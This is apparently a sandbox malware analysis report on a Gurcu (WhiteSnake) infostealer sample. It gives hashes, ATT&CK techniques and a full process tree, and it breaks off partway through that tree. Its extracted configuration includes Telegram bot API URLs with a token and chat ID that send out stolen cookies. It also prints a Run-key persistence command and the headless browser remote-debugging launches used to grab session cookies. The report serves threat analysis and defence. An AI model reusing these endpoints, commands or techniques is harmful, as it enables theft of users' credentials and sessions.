gurcu | 28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc

Analysis

max time kernel
104s
max time network
122s
platform
windows10-ltsc_2021_x64
resource
win10ltsc2021-20250314-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
submitted
06/04/2025, 19:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

generated21.exe
Size

2.8MB
MD5

2ee4087423cdcc9ef14519db15f627b6
SHA1

104667f7a390ce8d36a384365d6cca93dbff402f
SHA256

28828524d62ba090c2a5a558afee71c10d4b4db87c6d73e074698ef4395b8bdc
SHA512

9f68b9e4136cb60eb42729b58097b9185a833b77bb5a253d5492ba259f50cd1ec4ebda1f37184aada58c9f39eb6e02b48964e41e6deb5dc57a2305bcdd6f76eb
SSDEEP

49152:ws0IXxtkqXfd+/9A9Acc125Zsl5hanCLm/+axysYC6syUkoPaPS2AJNySUP7k:wF6xtkqXf0FZjGsJWCLmctClVkoOSfJ0

Score

10^/10

gurcu credential_access discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendMessage?chat_id=6565043849

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/sendDocument?chat_id=6565043849&caption=%F0%9F%A5%A0Cookies%20from%20these%20websites%20%5Bgmail.com%20github.com%20%5D%20were%20successfully%20grabbed%20from%20the%20Default%20profile%20of%20Chrom

https://api.telegram.org/bot6890762661:AAFmz6vcAEVtyRktHezAUxQESQdrtr_vvrQ/getUpdates?offset=-

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Uses browser remote debugging 2 TTPs 11 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5972	chrome.exe
4264	chrome.exe
688	chrome.exe
4380	msedge.exe
5512	msedge.exe
1312	msedge.exe
5380	chrome.exe
2632	chrome.exe
4724	msedge.exe
4828	msedge.exe
2388	msedge.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	generated21.exe
Key value queried	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\Control Panel\International\Geo\Nation	Updater.exe

Executes dropped EXE 2 IoCs

pid	Process
5012	Updater.exe
640	Updater.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-809364120-1453366396-340093129-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsEdgeUpdate = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdater\\Updater.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
8	raw.githubusercontent.com
10	raw.githubusercontent.com
20	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
4080	tasklist.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1104	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-809364120-1453366396-340093129-1000\{941EDCC7-7D4B-4AFB-AA82-5B762CEE60F7}	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1816	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
4508	generated21.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5012	Updater.exe
5972	chrome.exe
5972	chrome.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe
640	Updater.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
5972	chrome.exe
5972	chrome.exe
5972	chrome.exe
5972	chrome.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe
4380	msedge.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	4508	generated21.exe
Token: SeDebugPrivilege	4080	tasklist.exe
Token: SeDebugPrivilege	5012	Updater.exe
Token: SeDebugPrivilege	640	Updater.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe
Token: SeShutdownPrivilege	5972	chrome.exe
Token: SeCreatePagefilePrivilege	5972	chrome.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
5972	chrome.exe
4380	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 2128	4508	generated21.exe	86
PID 4508 wrote to memory of 2128	4508	generated21.exe	86
PID 2128 wrote to memory of 3344	2128	cmd.exe	88
PID 2128 wrote to memory of 3344	2128	cmd.exe	88
PID 2128 wrote to memory of 4080	2128	cmd.exe	89
PID 2128 wrote to memory of 4080	2128	cmd.exe	89
PID 2128 wrote to memory of 5664	2128	cmd.exe	90
PID 2128 wrote to memory of 5664	2128	cmd.exe	90
PID 2128 wrote to memory of 1104	2128	cmd.exe	91
PID 2128 wrote to memory of 1104	2128	cmd.exe	91
PID 2128 wrote to memory of 5012	2128	cmd.exe	92
PID 2128 wrote to memory of 5012	2128	cmd.exe	92
PID 5012 wrote to memory of 4892	5012	Updater.exe	95
PID 5012 wrote to memory of 4892	5012	Updater.exe	95
PID 4892 wrote to memory of 1816	4892	cmd.exe	97
PID 4892 wrote to memory of 1816	4892	cmd.exe	97
PID 5072 wrote to memory of 640	5072	cmd.exe	100
PID 5072 wrote to memory of 640	5072	cmd.exe	100
PID 5012 wrote to memory of 5972	5012	Updater.exe	101
PID 5012 wrote to memory of 5972	5012	Updater.exe	101
PID 5972 wrote to memory of 5064	5972	chrome.exe	102
PID 5972 wrote to memory of 5064	5972	chrome.exe	102
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 956	5972	chrome.exe	103
PID 5972 wrote to memory of 2092	5972	chrome.exe	104
PID 5972 wrote to memory of 2092	5972	chrome.exe	104
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105
PID 5972 wrote to memory of 4980	5972	chrome.exe	105

C:\Users\Admin\AppData\Local\Temp\generated21.exe
"C:\Users\Admin\AppData\Local\Temp\generated21.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp9F3D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp9F3D.tmp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2128
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:3344
- - C:\Windows\system32\tasklist.exe
    Tasklist /fi "PID eq 4508"
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\system32\find.exe
    find ":"
    3⤵
    PID:5664
- - C:\Windows\system32\timeout.exe
    Timeout /T 1 /Nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1104
- - C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe
    "C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MsEdgeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v MsEdgeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\AdobeUpdater\Updater.exe /f
        5⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1816
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-field-trial-config --disable-hang-monitor --disable-infobars --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-search-engine-choice-screen --disable-sync --enable-automation --enable-blink-features=IdleDetection --export-tagged-pdf --generate-pdf-document-outline --force-color-profile=srgb --metrics-recording-only --no-first-run --password-store=basic --use-mock-keychain --disable-features=Translate,AcceptCHFrame,MediaRouter,OptimizationHints,ProcessPerSiteUpToMainFrameThreshold --enable-features= --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --headless=new --hide-scrollbars --mute-audio about:blank --window-position=-2400,-2400 --profile-directory=Default --remote-debugging-port=0
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5972
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffb1306dcf8,0x7ffb1306dd04,0x7ffb1306dd10
        5⤵
        
        PID:5064
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2012 /prefetch:2
        5⤵
        
        PID:956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2304,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2300 /prefetch:3
        5⤵
        
        PID:2092
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2744,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2620 /prefetch:8
        5⤵
        
        PID:4980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3276 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4264
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3316,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3312 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5380
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4476,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4504 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:2632
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4652,i,16812953067069756185,9883231486938253524,262144 --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3660 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:688
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --allow-pre-commit-input --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-field-trial-config --disable-hang-monitor --disable-infobars --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-search-engine-choice-screen --disable-sync --enable-automation --enable-blink-features=IdleDetection --export-tagged-pdf --generate-pdf-document-outline --force-color-profile=srgb --metrics-recording-only --no-first-run --password-store=basic --use-mock-keychain --disable-features=Translate,AcceptCHFrame,MediaRouter,OptimizationHints,ProcessPerSiteUpToMainFrameThreshold --enable-features= --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --headless=new --hide-scrollbars --mute-audio about:blank --window-position=-2400,-2400 --profile-directory=Default --remote-debugging-port=0
      4⤵
      Uses browser remote debugging
      Drops file in Windows directory
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:4380
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x270,0x274,0x278,0x26c,0x280,0x7ffb134ef208,0x7ffb134ef214,0x7ffb134ef220
        5⤵
        
        PID:4708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2308,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:3
        5⤵
        
        PID:5504
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-breakpad --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2276,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:2
        5⤵
        
        PID:5700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2588,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:8
        5⤵
        
        PID:856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3268,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=3256 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4724
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3284,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:5512
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4080,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4076 /prefetch:8
        5⤵
        
        PID:3848
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --message-loop-type-ui --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=4560,i,12454497099784051520,9842849371291456926,262144 --enable-features=msMetricsLogFastStartup,msSendMetricsLogOnClose --disable-features=AcceptCHFrame,MediaRouter,OptimizationHints,PaintHolding,ProcessPerSiteUpToMainFrameThreshold,Translate --variations-seed-version --mojo-platform-channel-handle=4552 /prefetch:8
        5⤵
        
        PID:1708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
